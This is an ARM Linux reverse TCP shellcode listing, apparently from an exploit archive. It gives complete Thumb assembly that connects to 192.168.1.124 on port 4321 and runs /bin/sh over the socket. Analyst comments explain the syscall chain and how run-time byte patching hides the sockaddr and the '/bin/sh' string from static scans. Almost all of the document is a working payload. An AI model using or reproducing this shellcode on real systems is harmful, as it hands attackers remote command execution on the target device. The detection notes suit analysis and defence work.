Linux/ARM - Reverse TCP (192.168.1.124:4321) Shell (/bin/sh) Shellcode (64 bytes)
// This is a slightly modified version of an ARM shellcode to open a reverse TCP shell.
// The original can be found here: https://www.exploit-db.com/exploits/46258
// and was made by Gokul Babu - https://www.linkedin.com/in/gokul-babu-452b3b112/
//
// Analyst notes (Linux/ARM EABI, GNU as syntax; on this target ';' is a
// statement separator, which is why the comments use // and /* */):
//   Call chain: socket -> connect -> dup2 -> dup2 -> execve, i.e. the
//   canonical reverse-shell syscall sequence. Each syscall number is
//   loaded into r7 and entered with `svc #1`; the stub first switches
//   from ARM to Thumb state so the 16-bit encodings keep the blob small.
//   Two bytes are patched at run time (a NUL into the sockaddr family
//   field and a NUL terminator onto "/bin/shX"), so a static scan of the
//   raw bytes will not find a well-formed sockaddr_in or a NUL-terminated
//   "/bin/sh" - decode or emulate before matching on those strings.
//   Both patches write into .text, so the blob only runs from a mapping
//   that is writable as well as executable; on a W^X page the first strb
//   faults.
//   The network indicators (port, then IPv4 address) are the last six
//   bytes of the blob, under the sockaddr label.
.section .text
.global _start
_start:
.ARM
add r3,pc,#1 /* in ARM state pc reads as this insn + 8, so r3 = address of the Thumb code with bit 0 set */
bx r3 /* bit 0 set -> switch to Thumb state */
.THUMB
//socket(AF_INET = 2, SOCK_STREAM = 1, r2): r2 is relied on being 0 already (see the push comment below)
mov r0,#2
mov r1,#1
mov r7,#200 /* syscall number 281 (socket) built in two steps: Thumb mov takes only an 8-bit immediate */
add r7,#81
svc #1
push {r0,r1,r2} /*store all values r0=3,r1=1,r2=0 (r0 = socket fd returned by the kernel, author assumes it is 3)*/
//connect(sockfd still in r0, &sockaddr, 16)
adr r1, sockaddr
strb r2,[r1,#1] /* r2 == 0: overwrite the 0xff placeholder so the family bytes become 02 00 (AF_INET) without a NUL in the blob */
mov r2,#16 /* sizeof(struct sockaddr_in) */
add r7,#2 /* r7 = 283 (connect) */
svc #1
//dup2:
//dup2(3,2)/*No need of stderr, program works fine without stderr*/
pop {r0,r1,r2} /* Restoring all values: r0 = socket fd, r1 = 1, r2 = 0 */
mov r7,#63 /* 63 = dup2 */
//dup2(3,1): stdout -> socket
svc #1
//dup2(3,0) -> but gets changed to dup2(1,0)-see strace debug file for reference
//  (r0 now holds the previous call's return value, i.e. fd 1; since fd 1 already
//   refers to the socket, stdin still ends up on the socket)
sub r1,#1
svc #1
//execve("/bin/sh", NULL, NULL): r1 = 0 after the sub above, r2 = 0 from the pop
adr r0,exc
strb r1,[r0,#7] /* r1 == 0: overwrite the trailing 'X' so the path is NUL-terminated only at run time */
mov r7,#11 /* 11 = execve */
svc #1
exc:
.ascii "/bin/shX" /* 'X' is the placeholder patched to NUL above */
sockaddr:
.ascii "\x02\xff" /* sin_family: 0xff placeholder is zeroed at run time -> AF_INET */
.ascii "\x10\xE1" //port 4321 (0x10E1, network byte order)
.byte 192,168,1,124 //IP (sin_addr, the C2 indicator)